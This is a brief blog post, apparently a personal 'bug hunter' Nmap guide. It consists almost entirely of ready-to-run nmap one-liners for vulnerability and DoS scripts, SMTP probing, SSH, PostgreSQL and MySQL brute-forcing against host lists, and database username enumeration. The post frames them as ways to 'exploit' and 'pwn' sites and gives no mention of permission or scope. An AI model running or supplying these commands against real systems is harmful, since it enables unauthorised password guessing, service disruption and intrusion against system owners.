# Nmap guide (BugHunter perspective) **Published by:** [TheSecurityGuy](https://paragraph.com/@mrbalu/) **Published on:** 2022-12-01 **URL:** https://paragraph.com/@mrbalu/nmap-guide-bughunter-perspective ## Content Scan the vulnerabilities here → nmap -v --script vuln www.hiddendomainname.info dos : nmap -v --script dos www.hiddendomainname.info smtp access : nmap smtp.damnvulnsite.com -pT:587,465,25 -sV --script=smtp-commands Exploit sites having port 22 open : nmap -p 22 --script ssh-brute --script-args userdb=users.lst,passdb=pass.lst --script-args ssh-brute.timeout=4s -iL ssh.txt pwn postgres : nmap -sV -iL sql.txt --script=pgsql-brute -p 5432 -T0 -oG output.txt sql username enumeration: nmap -iL sql.txt --script=mysql-enum -p 3306 -oG out.txt pwning mysql-brute : nmap --script=mysql-brute vulnsite1337.com ## Publication Information - [TheSecurityGuy](https://paragraph.com/@mrbalu/): Publication homepage - [All Posts](https://paragraph.com/@mrbalu/): More posts from this publication - [RSS Feed](https://api.paragraph.com/blogs/rss/@mrbalu): Subscribe to updates - [Twitter](https://twitter.com/_TheSecurityGuy): Follow on Twitter